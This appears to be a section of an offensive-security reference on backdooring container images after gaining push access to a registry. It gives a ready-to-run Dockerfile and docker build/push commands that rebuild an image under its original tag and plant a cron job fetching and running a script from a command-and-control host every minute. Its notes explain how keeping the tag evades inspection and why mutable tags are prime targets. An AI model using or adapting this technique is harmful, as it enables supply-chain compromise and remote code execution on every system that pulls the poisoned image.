With push access to a registry (stolen credentials, an open registry, or a compromised CI), an attacker replaces or publishes an image so that deploying it runs their code. The backdoor can be an added layer, a modified entrypoint, or a poisoned dependency pulled at build time.
# Rebuild from the real image with an added payload, keep the same tag
cat > Dockerfile <<'DF'
FROM <acct>/<repo>:<tag>
RUN echo '* * * * * root curl -s http://c2/x | sh' > /etc/cron.d/x
DF
docker build -t <acct>/<repo>:<tag> . && docker push <acct>/<repo>:<tag>
Exploitation notes#
- Keeping the original tag and base makes the image behave normally, so the backdoor survives casual inspection; the cron or entrypoint addition is the foothold.
- Mutable tags (
latest, environment tags) are the highest-value targets because deployments re-pull them. - Reaching push access is covered under Registry access and Unauthenticated registry access.